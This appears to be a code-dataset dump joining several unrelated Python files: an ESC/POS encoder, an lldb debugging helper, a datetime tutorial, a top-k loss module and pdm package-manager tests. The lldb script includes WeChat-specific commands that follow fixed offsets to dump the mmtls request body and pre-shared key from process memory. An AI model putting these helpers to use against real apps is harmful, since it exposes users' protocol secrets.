             for char in text])

    def __encoding_sort_func(self, item):
        key, index = item
        # Sort key: already-used encodings first (False sorts before
        # True), then by ESC/POS slot index. The previous implementation
        # sorted used encodings LAST, contradicting the documented search
        # order in find_suitable_encoding below.
        return (key not in self.used_encodings, index)

    def find_suitable_encoding(self, char):
        """The order of our search is a specific one:

        1. code pages that we already tried before; there is a good
           chance they might work again, reducing the search space,
           and by re-using already used encodings we might also
           reduce the number of codepage change instructions we have
           to send. Still, any performance gains will presumably be
           fairly minor.

        2. code pages in lower ESCPOS slots first. Presumably, they
           are more likely to be supported, so if a printer profile
           is missing or incomplete, we might increase our chance
           that the code page we pick for this character is actually
           supported.
        """
        sorted_encodings = sorted(
            self.codepages.items(),
            key=self.__encoding_sort_func)

        for encoding, _ in sorted_encodings:
            if self.can_encode(encoding, char):
                # This encoding worked; add it to the set of used ones.
                self.used_encodings.add(encoding)
                return encoding
def split_writable_text(encoder, text, encoding):
    """Splits off as many characters from the beginning of text as
    are writable with "encoding". Returns a 2-tuple (writable, rest).
    """
    if not encoding:
        return None, text

    for position, char in enumerate(text):
        if not encoder.can_encode(encoding, char):
            # First unwritable character: split here.
            return text[:position], text[position:]
    # Every character was writable.
    return text, None
class MagicEncode(object):
    """Transparently switches the printer to whichever code page can
    represent the text being written.

    Consults the printer profile's supported code pages; if a character
    cannot be encoded with the current one, a suitable alternative is
    looked up. If the printer supports no suitable code page, an error
    character is inserted instead.
    """

    def __init__(self, driver, encoding=None, disabled=False,
                 defaultsymbol='?', encoder=None):
        """
        :param driver: the printer driver used to emit raw bytes.
        :param encoding: If you know the current encoding of the printer
            when initializing this class, set it here. If the current
            encoding is unknown, the first character emitted will be a
            codepage switch.
        :param disabled: disable automatic code-page switching.
        :param defaultsymbol: replacement for unencodable characters.
        :param encoder: optional pre-built Encoder instance.
        """
        if disabled and not encoding:
            raise Error('If you disable magic encode, you need to define an encoding!')

        self.driver = driver
        self.encoder = encoder or Encoder(driver.profile.get_code_pages())

        self.encoding = self.encoder.get_encoding_name(encoding) if encoding else None
        self.defaultsymbol = defaultsymbol
        self.disabled = disabled

    def force_encoding(self, encoding):
        """Set a fixed encoding, emitting the change right away.

        Afterwards this buffer will not switch the code page anymore,
        although it still keeps track of the current code page. Passing
        a falsy value re-enables automatic switching.
        """
        if not encoding:
            self.disabled = False
        else:
            self.write_with_encoding(encoding, None)
            self.disabled = True

    def write(self, text):
        """Write the text, automatically switching encodings."""

        if self.disabled:
            self.write_with_encoding(self.encoding, text)
            return

        # Emit the longest prefix writable with the current encoding.
        writable, remainder = split_writable_text(self.encoder, text, self.encoding)
        if writable:
            self.write_with_encoding(self.encoding, writable)

        while remainder:
            # See if any of the profile's code pages can encode the next
            # character.
            candidate = self.encoder.find_suitable_encoding(remainder[0])
            if not candidate:
                self._handle_character_failed(remainder[0])
                remainder = remainder[1:]
                continue

            # Write as much of the remaining text as that encoding allows.
            writable, remainder = split_writable_text(
                self.encoder, remainder, candidate)
            if writable:
                self.write_with_encoding(candidate, writable)

    def _handle_character_failed(self, char):
        """Called when no codepage was found to render a character."""
        # Writing the default symbol via write() avoids an unnecessary
        # codepage switch for the replacement character itself.
        self.write(self.defaultsymbol)

    def write_with_encoding(self, encoding, text):
        if text is not None and type(text) is not six.text_type:
            raise Error("The supplied text has to be unicode, but is of type {type}.".format(
                type=type(text)
            ))

        # The current code page is always tracked; a change instruction
        # is emitted only when the new one differs.
        if encoding != self.encoding:
            self.encoding = encoding
            self.driver._raw(
                CODEPAGE_CHANGE +
                six.int2byte(self.encoder.get_sequence(encoding)))

        if text:
            self.driver._raw(self.encoder.encode(text, encoding))
| 36.890785 | 104 | 0.636414 |
ace8eb2dd7db355983230e8f6a72f67ac8db2f8f | 6,443 | py | Python | util/lldb_util.py | Dorllen/AssemMocker | cd85ffc4076cc9e82af159924758ab89da1d7e71 | [
"MIT"
] | null | null | null | util/lldb_util.py | Dorllen/AssemMocker | cd85ffc4076cc9e82af159924758ab89da1d7e71 | [
"MIT"
] | null | null | null | util/lldb_util.py | Dorllen/AssemMocker | cd85ffc4076cc9e82af159924758ab89da1d7e71 | [
"MIT"
] | null | null | null | import lldb
import re
# Output directory for all dump files; must be set before importing this
# script into lldb (the assert below enforces it at import time).
base_save_path = None # "simple/dy/lldb_result"
assert base_save_path, "ๆ็คบ๏ผ่ฏท่ฎพ็ฝฎๆไปถไฟๅญ่ทฏๅพ"
# NOTE(review): max_loop appears unused in this module -- confirm before removing.
max_loop = 2
def dump_function(debugger, command, result, internal_dict):
    """Disassemble the current function and save it to lldb_func_<name>.txt.

    :param command: optional function name; when empty, the name is parsed
        from the disassembly's ``unnamed_symbol...$$<module>`` label.
    """
    interpreter = lldb.debugger.GetCommandInterpreter()
    return_object = lldb.SBCommandReturnObject()  # receives the command's output
    interpreter.HandleCommand('dis', return_object)  # run the `dis` command
    output = return_object.GetOutput()  # the textual disassembly
    # Fixed character class: [a-zA-z] also matched '[', '\', ']', '^', '_'
    # and '`' by accident; [a-zA-Z] is what was intended.
    # Also renamed the local so it no longer shadows the `result` parameter.
    matches = re.findall("unnamed_(symbol.+\\$\\$[a-zA-Z]+)", output)
    command = command or matches[0]
    command = command.strip()
    print("dump functions:", command)
    file_path = f"{base_save_path}/lldb_func_{command}.txt"
    with open(file_path, "w") as f:
        # Strip leftover ANSI color fragments from the disassembly text.
        f.write(output.replace("[33m", "").replace("[0m", ""))
    print("save to:", file_path)
def dump_registers(debugger, command, result, internal_dict):
    """Write the full `register read` output to lldb_registers.txt."""
    ci = lldb.debugger.GetCommandInterpreter()
    ret = lldb.SBCommandReturnObject()  # receives the command's output
    ci.HandleCommand('register read', ret)
    reg_text = ret.GetOutput()
    print("dump registers")
    out_path = f"{base_save_path}/lldb_registers.txt"
    with open(out_path, "w") as fh:
        fh.write(reg_text)
    print("save to:", out_path)
def dump_mems(debugger, command, result, internal_dict):
    """Dump memory for "<addr> [count]" to lldb_mem_<addr>.txt.

    ``count`` defaults to 4096 bytes when not supplied.
    """
    print("dump mems:", command)
    if not command:
        return
    ci = lldb.debugger.GetCommandInterpreter()
    ret = lldb.SBCommandReturnObject()  # receives the command's output
    parts = command.strip().split(" ")
    addr = parts[0]
    count = parts[1] if len(parts) > 1 else 4096
    print(f'memory read -c {count} --force {addr}')
    ci.HandleCommand(f'memory read -c {count} --force {addr}', ret)
    raw = ret.GetOutput()
    out_path = f"{base_save_path}/lldb_mem_{addr}.txt"
    with open(out_path, "w") as fh:
        fh.write(raw.encode("unicode_escape").decode().replace("\\n", "\n"))
    print("save to:", out_path)
def dump_ext_registers(debugger, command, result, internal_dict):
    """Dump SIMD registers q0..q31 to lldb_ext_registers.txt."""
    ci = lldb.debugger.GetCommandInterpreter()
    ret = lldb.SBCommandReturnObject()  # receives each command's output
    chunks = []
    for idx in range(0, 32):
        ci.HandleCommand(f'register read q{idx}', ret)
        chunks.append(ret.GetOutput().encode("unicode_escape").decode())
    print("dump registers ext")
    out_path = f"{base_save_path}/lldb_ext_registers.txt"
    with open(out_path, "w") as fh:
        fh.write("".join(chunks))
    print("save to:", out_path)
def dump_line(debugger, command, result, internal_dict):
    """Append the current instruction to lldb_codes_<symbol>.txt, then step.

    Intended to be invoked repeatedly to trace a function one instruction
    at a time (it issues `n` after logging).
    """
    interpreter = lldb.debugger.GetCommandInterpreter()
    return_object = lldb.SBCommandReturnObject()  # receives the command's output
    interpreter.HandleCommand(f'disassemble -p -c 1', return_object)
    output = return_object.GetOutput()
    # Fixed character class: [a-zA-z] also matched '[', '\', ']', '^', '_'
    # and '`' by accident; [a-zA-Z] is what was intended.
    # Also renamed the local so it no longer shadows the `result` parameter.
    matches = re.findall("unnamed_(symbol.+)\\$\\$[a-zA-z]+".replace("A-z", "A-Z"), output)
    file_path = f"{base_save_path}/lldb_codes_{matches[0]}.txt"
    with open(file_path, "a") as f:
        lines = output.split("\n")
        # lines[1] is presumably the instruction line after the frame
        # header -- TODO confirm against actual `disassemble -p` output.
        f.write(lines[1].encode("unicode_escape").decode() + "\n")
    debugger.HandleCommand("n")  # step to the next line/instruction
def get_command_out(_command):
    """Run an lldb command and return its textual output, stripped."""
    ret = lldb.SBCommandReturnObject()
    lldb.debugger.GetCommandInterpreter().HandleCommand(_command, ret)
    return ret.GetOutput().strip()
def read_ptr_value(addr):
    """Dereference *addr* via `memory read/gx` and return the value text."""
    dumped = get_command_out(f"memory read/gx {addr}")
    # Output looks like "<addr>: <value>"; keep the part after the last ": ".
    return dumped.rpartition(": ")[2]
def read_register_value(r):
    """Return the value text of register *r* (e.g. "$x0") via `po/x`."""
    dumped = get_command_out(f"po/x {r}")
    # Keep the part after the last ": " of the printed result.
    return dumped.rpartition(": ")[2]
def read_mem_from_ptr(debugger, command, result, internal_dict):
    """Dereference the pointer stored at "<addr> [count]" and dump the
    memory it points to (count defaults to 64)."""
    args = command.split(" ")
    addr = args[0]
    mem_size = args[1] if len(args) > 1 else 64
    target = read_ptr_value(addr)
    _command = f"memory read -c {mem_size} {target}"
    print("_command:", _command)
    debugger.HandleCommand(_command)
def read_mem_by_easy(debugger, command, result, internal_dict):
    """Dump memory directly at "<addr> [count]" (count defaults to 64)."""
    args = command.split(" ")
    addr = args[0]
    mem_size = args[1] if len(args) > 1 else 64
    _command = f"memory read -c {mem_size} {addr}"
    print("_command:", _command)
    debugger.HandleCommand(_command)
##### ๅฎๅถๅๅค็้จๅ ###########
def wechat_test_for_mem(debugger, command, result, internal_dict):
    """Dump the mmtls request body and PSK reachable from register x19.

    Breakpoint helper: expects the target to be stopped at mmtls:Init
    (offset 0x26D094). The struct offsets below are reverse-engineered --
    TODO confirm against the specific WeChat build being inspected.
    """
    # Intended for the mmtls:Init breakpoint at offset 0x26D094.
    x0 = read_register_value("$x19")
    x19_value = int(x0, 16)
    x19_0x60 = x19_value + 0x60
    _ = read_ptr_value(x19_0x60)
    print("read request body addr: (focus on +0x20)")
    _command = f"memory read -c 64 {_}"
    print(_command)
    lldb.debugger.HandleCommand(_command)
    print("\nread psk:")
    # Follow the pointer chain *(*(*(x19 + 0xb8) + 8) + 0x28) to the PSK.
    _ = read_ptr_value(x19_value + 0xb8) #
    print("_:", _, hex(x19_value))
    _ = read_ptr_value(int(_, 16) + 8)
    print("_:", _)
    psk_addr = read_ptr_value(int(_, 16) + 0x28)
    print("_:", psk_addr)
    # Dump 0x94 bytes at the final address.
    _command = f"memory read -c 0x94 {psk_addr}"
    lldb.debugger.HandleCommand(_command)
def wechat_test_for_b0(debugger, command, result, internal_dict):
    """Dump the mmtls send buffer reachable from register x0.

    Breakpoint helper: expects the target to be stopped at
    mmtls::ClientChannel::WriteMsgToSendBuffer (offset 0x26EF64). Offsets
    are reverse-engineered -- TODO confirm against the targeted build.
    """
    # Intended for the WriteMsgToSendBuffer breakpoint at offset 0x26EF64.
    x0 = read_register_value("$x0")
    # Follow the pointer chain *(*(*(x0 + 0x8 + 0x10) + 0x28) + 0x8).
    _ = read_ptr_value(int(x0, 16) + 0x8 + 0x10)
    _ = read_ptr_value(int(_, 16) + 0x28)
    _ = read_ptr_value(int(_, 16) + 0x8)
    _command = f"memory read -c 0x64 {_}"
    print("_command:", _command)
    lldb.debugger.HandleCommand(_command)
# Load with: command script import xxx/lldb_util.py
def __lldb_init_module(debugger, internal_dict):
    """Called automatically by lldb when this module is loaded; registers
    the helpers above as interactive commands (dumpF, dumpM, ...)."""
    # lldb invokes this hook once at `command script import` time.
    debugger.HandleCommand('command script add -f lldb_util.dump_function dumpF')
    debugger.HandleCommand('command script add -f lldb_util.dump_mems dumpM')
    debugger.HandleCommand('command script add -f lldb_util.dump_registers dumpR')
    debugger.HandleCommand('command script add -f lldb_util.dump_ext_registers dumpR2')
    debugger.HandleCommand('command script add -f lldb_util.dump_line dumpL')
    debugger.HandleCommand('command script add -f lldb_util.read_mem_from_ptr readPtr')
    debugger.HandleCommand('command script add -f lldb_util.read_mem_by_easy measy')
    debugger.HandleCommand('command script add -f lldb_util.wechat_test_for_mem wechat_x19')
    debugger.HandleCommand('command script add -f lldb_util.wechat_test_for_b0 wechat_b0')
| 35.994413 | 92 | 0.683998 |
ace8eb35e65e704dc42a6fb7dbb8c125b9d229b9 | 1,355 | py | Python | Curso/paquete/44_ManejoFechas_datatime.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | Curso/paquete/44_ManejoFechas_datatime.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | Curso/paquete/44_ManejoFechas_datatime.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | import datetime
# Demo of the datetime module. Improvements over the original: consistent
# snake_case naming (fechaFutura -> fecha_futura) and English comments.
# Alternative import style kept for reference:
# from datetime import datetime
fecha_actual = datetime.datetime.now()
# fechaActual = datetime.now()  # how it would look with the import above
print(fecha_actual)
fecha_premake = datetime.datetime(2020, 11, 5)
print(fecha_premake)
fecha_premake2 = datetime.datetime(2020, 11, 5, 10, 35, 21)
print(fecha_premake2)
# strftime: datetime -> formatted string (format codes: https://strftime.org/)
fecha_personalizada = datetime.datetime.strftime(fecha_actual, '%d/%m/%Y %H:%M:%S')
print(fecha_personalizada)
fecha_personalizada2 = datetime.datetime.strftime(fecha_actual, '%b %d %Y %H:%M:%S')
print(fecha_personalizada2)
# strptime: formatted string -> datetime
fecha_texto = 'Dec 06 2020 12:56:11'
fecha_a_formato_datetime = datetime.datetime.strptime(fecha_texto, '%b %d %Y %H:%M:%S')
print(fecha_a_formato_datetime)
# Extracting individual components as text / numbers.
dia = datetime.datetime.strftime(fecha_actual, '%d')
print(dia)
dia_en_int = int(datetime.datetime.strftime(fecha_actual, '%d'))
print(dia_en_int)
hora_actual = datetime.datetime.strftime(fecha_actual, '%H:%M:%S')
print(hora_actual)
# Subtracting two datetimes yields a timedelta.
fecha_pasada = datetime.datetime(2020, 10, 23)
diferencia = fecha_actual - fecha_pasada
print(diferencia)
print(diferencia.days)
print(diferencia.total_seconds())
# Adding a (negative) timedelta shifts a date into the past.
dia_delta = datetime.timedelta(days=-5)
fecha_inicial = datetime.date.today()
print(fecha_inicial)
fecha_futura = fecha_inicial + dia_delta
print(fecha_futura)
# ISO-8601 formatting.
fecha_iso = datetime.datetime.now().isoformat()
print(fecha_iso)
| 27.1 | 87 | 0.771218 |
ace8ec1a3bb80d245beae574fe3211e8f7edb1b7 | 3,979 | py | Python | topk/polynomial/sp.py | afansi/smooth-topk | d115b66f19489e2c8b572efabd6d947dc4e54a3c | [
"MIT"
] | null | null | null | topk/polynomial/sp.py | afansi/smooth-topk | d115b66f19489e2c8b572efabd6d947dc4e54a3c | [
"MIT"
] | null | null | null | topk/polynomial/sp.py | afansi/smooth-topk | d115b66f19489e2c8b572efabd6d947dc4e54a3c | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.autograd as ag
from topk.polynomial.divide_conquer import divide_and_conquer
from topk.polynomial.multiplication import Multiplication
from topk.polynomial.grad import d_logS_d_expX
class LogSumExp(nn.Module):
    """Module wrapper around :class:`LogSumExpNew_F`.

    ``forward`` returns a ``(2, n_samples)`` tensor holding the log-space
    elementary-symmetric-polynomial coefficients sigma_{k-1} and sigma_k
    over ``exp(x)`` (see the Function below).
    """

    def __init__(self, k, p=None, thresh=1e-5):
        super(LogSumExp, self).__init__()
        self.k = k
        # Default padding of extra coefficients grows with roughly 20% of k.
        self.p = int(1 + 0.2 * k) if p is None else p
        self.thresh = thresh
        # Polynomial multiplication operator sized for degree k + p - 1.
        self.mul = Multiplication(self.k + self.p - 1)
        # Gradient work buffers; registered so they move with the module's
        # device and are reused across backward passes.
        self.register_buffer('grad_k', torch.Tensor(0))
        self.register_buffer('grad_km1', torch.Tensor(0))

    def forward(self, x):
        return LogSumExpNew_F.apply(
            x, self.k, self.p, self.thresh, self.grad_km1, self.grad_k, self.mul
        )
class LogSumExpNew_F(ag.Function):
    """Custom autograd function computing log-space sigma coefficients.

    Convention (from the original authors): variables whose name starts
    with an upper-case letter live in log-space.
    """

    @staticmethod
    def forward(ctx, x, k, p, thresh, grad_km1, grad_k, mul):
        """
        Returns a matrix of size (2, n_samples) with sigma_{k-1} and sigma_{k}
        for each sample of the mini-batch.
        """
        # Stash hyper-parameters and gradient buffers for backward().
        ctx.k = k
        ctx.p = p
        ctx.thresh = thresh
        ctx.grad_km1 = grad_km1
        ctx.grad_k = grad_k
        ctx.save_for_backward(x)
        # number of samples and number of coefficients to compute
        n_s = x.size(0)
        kp = k + p - 1
        assert kp <= x.size(1)
        # clone to allow in-place operations
        x = x.clone()
        # pre-compute normalization
        x_summed = x.sum(1)
        # invert in log-space
        x.t_().mul_(-1)
        # initialize polynomials (in log-space)
        x = [x, x.clone().fill_(0)]
        # polynomial multiplications
        log_res = divide_and_conquer(x, kp, mul=mul)
        # re-normalize
        coeff = log_res + x_summed[None, :]
        # avoid broadcasting issues (in particular if n_s = 1)
        coeff = coeff.view(kp + 1, n_s)
        # save all coeff for backward
        # NOTE(review): stored directly on ctx rather than via
        # save_for_backward -- presumably deliberate, as all kp+1
        # coefficients (not just the two returned) are needed in backward.
        ctx.saved_coeff = coeff
        return coeff[k - 1: k + 1]

    @staticmethod
    def backward(ctx, grad_sk):
        """
        Compute backward pass of LogSumExp.
        Python variables with an upper case first letter are in
        log-space, other are in standard space.
        """
        # tensors from forward pass
        X, = ctx.saved_tensors
        S = ctx.saved_coeff
        k = ctx.k
        p = ctx.p
        grad_km1 = ctx.grad_km1
        grad_k = ctx.grad_k
        thresh = ctx.thresh
        # extend to shape (ctx.k + 1, n_samples, n_classes) for backward
        S = S.unsqueeze(2).expand(S.size(0), X.size(0), X.size(1))
        # compute gradients for coeff of degree k and k - 1
        grad_km1 = d_logS_d_expX(S, X, k - 1, p, grad_km1, thresh)
        grad_k = d_logS_d_expX(S, X, k, p, grad_k, thresh)
        # chain rule: combine with incoming gradients (broadcast to all classes on third dim)
        grad_x = grad_sk[0, :, None] * grad_km1 + grad_sk[1, :, None] * grad_k
        # Keep the (possibly re-allocated) buffers for later reuse.
        ctx.grad_km1 = grad_km1
        ctx.grad_k = grad_k
        # One gradient slot per forward() argument; only x is differentiable.
        return grad_x, None, None, None, None, None, None
def log_sum_exp(x):
    """Numerically stable ``log(sum(exp(x), 1))`` for a 2d tensor.

    The row-wise maximum is factored out before exponentiating so large
    entries cannot overflow.
    """
    shift, _ = x.max(1)
    stabilized = torch.sum(torch.exp(x - shift[:, None]), 1)
    return shift + torch.log(stabilized)
def log_sum_exp_k_autograd(x, k):
    """Compute log-space coefficients sigma_{k-1} and sigma_k of exp(x).

    Same computation as :meth:`LogSumExpNew_F.forward` (without padding
    ``p``) but using only regular tensor ops, so standard autograd applies.
    Returns a ``(2, n_samples)`` tensor.
    """
    # number of samples and number of coefficients to compute
    n_s = x.size(0)
    assert k <= x.size(1)
    # clone to allow in-place operations
    x = x.clone()
    # pre-compute normalization
    x_summed = x.sum(1)
    # invert in log-space
    x.t_().mul_(-1)
    # initialize polynomials (in log-space)
    x = [x, x.clone().fill_(0)]
    # polynomial multiplications
    log_res = divide_and_conquer(x, k, mul=Multiplication(k))
    # re-normalize
    coeff = log_res + x_summed[None, :]
    # avoid broadcasting issues (in particular if n_s = 1)
    coeff = coeff.view(k + 1, n_s)
    return coeff[k - 1: k + 1]
| 27.068027 | 93 | 0.597135 |
ace8ec943ff987d21fe4479f9bcf27bf5aab9d24 | 10,397 | py | Python | tests/cli/test_add.py | julie777/pdm | a6029ca02105d79da4841c701edf73f7315f74eb | [
"MIT"
] | 1 | 2022-03-02T19:43:46.000Z | 2022-03-02T19:43:46.000Z | tests/cli/test_add.py | julie777/pdm | a6029ca02105d79da4841c701edf73f7315f74eb | [
"MIT"
] | 1 | 2022-03-20T07:36:27.000Z | 2022-03-20T07:36:27.000Z | tests/cli/test_add.py | julie777/pdm | a6029ca02105d79da4841c701edf73f7315f74eb | [
"MIT"
] | null | null | null | import shutil
from pathlib import Path
import pytest
from pdm.cli import actions
from pdm.models.pip_shims import Link
from pdm.models.specifiers import PySpecSet
from tests import FIXTURES
@pytest.mark.usefixtures("repository")
def test_add_package(project, working_set, is_dev):
    """Adding a package records it in the right group, locks transitive
    dependencies, and installs the whole dependency tree."""
    actions.do_add(project, is_dev, packages=["requests"])
    group = (
        project.tool_settings["dev-dependencies"]["dev"]
        if is_dev
        else project.meta["dependencies"]
    )
    assert group[0] == "requests~=2.19"
    locked_candidates = project.locked_repository.all_candidates
    assert locked_candidates["idna"].version == "2.7"
    for package in ("requests", "idna", "chardet", "urllib3", "certifi"):
        assert package in working_set
def test_add_command(project, invoke, mocker):
    """The `add` CLI command delegates to actions.do_add exactly once."""
    do_add = mocker.patch.object(actions, "do_add")
    invoke(["add", "requests"], obj=project)
    do_add.assert_called_once()
@pytest.mark.usefixtures("repository")
def test_add_package_to_custom_group(project, working_set):
    """A named group lands in optional-dependencies and still installs."""
    actions.do_add(project, group="test", packages=["requests"])
    assert "requests" in project.meta.optional_dependencies["test"][0]
    locked_candidates = project.locked_repository.all_candidates
    assert locked_candidates["idna"].version == "2.7"
    for package in ("requests", "idna", "chardet", "urllib3", "certifi"):
        assert package in working_set
@pytest.mark.usefixtures("repository")
def test_add_package_to_custom_dev_group(project, working_set):
    """A named dev group lands under tool.pdm dev-dependencies."""
    actions.do_add(project, dev=True, group="test", packages=["requests"])
    dependencies = project.tool_settings["dev-dependencies"]["test"]
    assert "requests" in dependencies[0]
    locked_candidates = project.locked_repository.all_candidates
    assert locked_candidates["idna"].version == "2.7"
    for package in ("requests", "idna", "chardet", "urllib3", "certifi"):
        assert package in working_set
@pytest.mark.usefixtures("repository", "vcs")
def test_add_editable_package(project, working_set, is_dev):
    """An editable VCS requirement is recorded with the -e prefix, locked
    at its revision, and can be re-synced as non-editable."""
    # Ensure that correct python version is used.
    project.environment.python_requires = PySpecSet(">=3.6")
    actions.do_add(project, is_dev, packages=["demo"])
    actions.do_add(
        project,
        is_dev,
        editables=["git+https://github.com/test-root/demo.git#egg=demo"],
    )
    group = (
        project.tool_settings["dev-dependencies"]["dev"]
        if is_dev
        else project.meta["dependencies"]
    )
    assert "demo" in group[0]
    assert "-e git+https://github.com/test-root/demo.git#egg=demo" in group[1]
    locked_candidates = project.locked_repository.all_candidates
    assert (
        locked_candidates["demo"].prepare(project.environment).revision
        == "1234567890abcdef"
    )
    assert locked_candidates["idna"].version == "2.7"
    assert "idna" in working_set
    actions.do_sync(project, no_editable=True)
    assert not working_set["demo"].link_file
@pytest.mark.usefixtures("repository", "vcs")
def test_editable_package_override_non_editable(project, working_set):
    """Adding the same requirement as editable replaces the regular install."""
    project.environment.python_requires = PySpecSet(">=3.6")
    actions.do_add(
        project, packages=["git+https://github.com/test-root/demo.git#egg=demo"]
    )
    actions.do_add(
        project,
        editables=["git+https://github.com/test-root/demo.git#egg=demo"],
    )
    assert working_set["demo"].link_file
@pytest.mark.usefixtures("repository", "working_set")
def test_add_remote_package_url(project, is_dev):
    """A direct wheel URL is stored as a PEP 508 "name @ url" requirement."""
    project.environment.python_requires = PySpecSet(">=3.6")
    actions.do_add(
        project,
        is_dev,
        packages=["http://fixtures.test/artifacts/demo-0.0.1-py2.py3-none-any.whl"],
    )
    group = (
        project.tool_settings["dev-dependencies"]["dev"]
        if is_dev
        else project.meta["dependencies"]
    )
    assert (
        group[0]
        == "demo @ http://fixtures.test/artifacts/demo-0.0.1-py2.py3-none-any.whl"
    )
@pytest.mark.usefixtures("repository")
def test_add_no_install(project, working_set):
    """With sync=False nothing gets installed into the environment."""
    actions.do_add(project, sync=False, packages=["requests"])
    for package in ("requests", "idna", "chardet", "urllib3", "certifi"):
        assert package not in working_set
@pytest.mark.usefixtures("repository")
def test_add_package_save_exact(project):
    """save="exact" pins the resolved version with ==."""
    actions.do_add(project, sync=False, save="exact", packages=["requests"])
    assert project.meta.dependencies[0] == "requests==2.19.1"
@pytest.mark.usefixtures("repository")
def test_add_package_save_wildcard(project):
    """save="wildcard" records the bare name with no version specifier."""
    actions.do_add(project, sync=False, save="wildcard", packages=["requests"])
    assert project.meta.dependencies[0] == "requests"
@pytest.mark.usefixtures("repository")
def test_add_package_save_minimum(project):
    """save="minimum" records a >= lower bound at the resolved version."""
    actions.do_add(project, sync=False, save="minimum", packages=["requests"])
    assert project.meta.dependencies[0] == "requests>=2.19.1"
def test_add_package_update_reuse(project, repository):
    """strategy="reuse" updates only the added package; already-locked
    transitive deps (chardet, pytz) keep their pinned versions."""
    actions.do_add(project, sync=False, save="wildcard", packages=["requests", "pytz"])
    locked_candidates = project.locked_repository.all_candidates
    assert locked_candidates["requests"].version == "2.19.1"
    assert locked_candidates["chardet"].version == "3.0.4"
    assert locked_candidates["pytz"].version == "2019.3"
    # Simulate newer releases appearing in the repository.
    repository.add_candidate("pytz", "2019.6")
    repository.add_candidate("chardet", "3.0.5")
    repository.add_candidate("requests", "2.20.0")
    repository.add_dependencies(
        "requests",
        "2.20.0",
        [
            "certifi>=2017.4.17",
            "chardet<3.1.0,>=3.0.2",
            "idna<2.8,>=2.5",
            "urllib3<1.24,>=1.21.1",
        ],
    )
    actions.do_add(
        project, sync=False, save="wildcard", packages=["requests"], strategy="reuse"
    )
    locked_candidates = project.locked_repository.all_candidates
    assert locked_candidates["requests"].version == "2.20.0"
    assert locked_candidates["chardet"].version == "3.0.4"
    assert locked_candidates["pytz"].version == "2019.3"
def test_add_package_update_eager(project, repository):
    """strategy="eager" also updates the added package's dependency tree
    (chardet moves to 3.0.5) but leaves unrelated packages (pytz) alone."""
    actions.do_add(project, sync=False, save="wildcard", packages=["requests", "pytz"])
    locked_candidates = project.locked_repository.all_candidates
    assert locked_candidates["requests"].version == "2.19.1"
    assert locked_candidates["chardet"].version == "3.0.4"
    assert locked_candidates["pytz"].version == "2019.3"
    # Simulate newer releases appearing in the repository.
    repository.add_candidate("pytz", "2019.6")
    repository.add_candidate("chardet", "3.0.5")
    repository.add_candidate("requests", "2.20.0")
    repository.add_dependencies(
        "requests",
        "2.20.0",
        [
            "certifi>=2017.4.17",
            "chardet<3.1.0,>=3.0.2",
            "idna<2.8,>=2.5",
            "urllib3<1.24,>=1.21.1",
        ],
    )
    actions.do_add(
        project, sync=False, save="wildcard", packages=["requests"], strategy="eager"
    )
    locked_candidates = project.locked_repository.all_candidates
    assert locked_candidates["requests"].version == "2.20.0"
    assert locked_candidates["chardet"].version == "3.0.5"
    assert locked_candidates["pytz"].version == "2019.3"
@pytest.mark.usefixtures("repository")
def test_add_package_with_mismatch_marker(project, working_set, mocker):
    """A requirement whose marker excludes the current platform is skipped."""
    mocker.patch(
        "pdm.models.environment.get_pep508_environment",
        return_value={"platform_system": "Darwin"},
    )
    actions.do_add(project, packages=["requests", "pytz; platform_system!='Darwin'"])
    assert "pytz" not in working_set
@pytest.mark.usefixtures("repository")
def test_add_dependency_from_multiple_parents(project, working_set, mocker):
    """chardet stays installed: its marker fails as a direct requirement,
    but requests still pulls it in as a transitive dependency."""
    mocker.patch(
        "pdm.models.environment.get_pep508_environment",
        return_value={"platform_system": "Darwin"},
    )
    actions.do_add(project, packages=["requests", "chardet; platform_system!='Darwin'"])
    assert "chardet" in working_set
@pytest.mark.usefixtures("repository")
def test_add_packages_without_self(project, working_set):
    """no_self=True keeps the project itself out of the environment."""
    project.environment.python_requires = PySpecSet(">=3.6")
    actions.do_add(project, packages=["requests"], no_self=True)
    assert project.meta.name not in working_set
@pytest.mark.usefixtures("repository", "working_set")
def test_add_package_unconstrained_rewrite_specifier(project):
    """unconstrained=True lets the resolver downgrade an existing pin and
    rewrites the saved specifier to match the new resolution."""
    project.environment.python_requires = PySpecSet(">=3.6")
    actions.do_add(project, packages=["django"], no_self=True)
    locked_candidates = project.locked_repository.all_candidates
    assert locked_candidates["django"].version == "2.2.9"
    assert project.meta.dependencies[0] == "django~=2.2"
    actions.do_add(
        project, packages=["django-toolbar"], no_self=True, unconstrained=True
    )
    locked_candidates = project.locked_repository.all_candidates
    assert locked_candidates["django"].version == "1.11.8"
    assert project.meta.dependencies[0] == "django~=1.11"
@pytest.mark.usefixtures("repository", "working_set", "vcs")
def test_add_cached_vcs_requirement(project, mocker):
    """A VCS requirement already in the wheel cache is installed without
    downloading or rebuilding."""
    project.environment.python_requires = PySpecSet(">=3.6")
    url = "git+https://github.com/test-root/demo.git@1234567890abcdef#egg=demo"
    built_path = FIXTURES / "artifacts/demo-0.0.1-py2.py3-none-any.whl"
    # Pre-populate the wheel cache slot for this exact link.
    wheel_cache = project.make_wheel_cache()
    cache_path = Path(wheel_cache.get_path_for_link(Link(url)))
    if not cache_path.exists():
        cache_path.mkdir(parents=True)
    shutil.copy2(built_path, cache_path)
    # Downloading or building would indicate a cache miss.
    downloader = mocker.patch("pdm.models.pip_shims.unpack_url")
    builder = mocker.patch("pdm.builders.WheelBuilder.build")
    actions.do_add(project, packages=[url], no_self=True)
    lockfile_entry = next(p for p in project.lockfile["package"] if p["name"] == "demo")
    assert lockfile_entry["revision"] == "1234567890abcdef"
    downloader.assert_not_called()
    builder.assert_not_called()
@pytest.mark.usefixtures("repository")
def test_add_with_dry_run(project, capsys):
    """dry_run=True prints the resolution without touching dependencies."""
    actions.do_add(project, dry_run=True, packages=["requests"])
    out, _ = capsys.readouterr()
    assert not project.get_dependencies()
    assert "requests 2.19.1" in out
    assert "urllib3 1.22" in out
@pytest.mark.usefixtures("repository")
def test_add_with_prerelease(project, working_set):
    """prerelease=True allows pre-release versions and saves them as the
    lower bound of the specifier."""
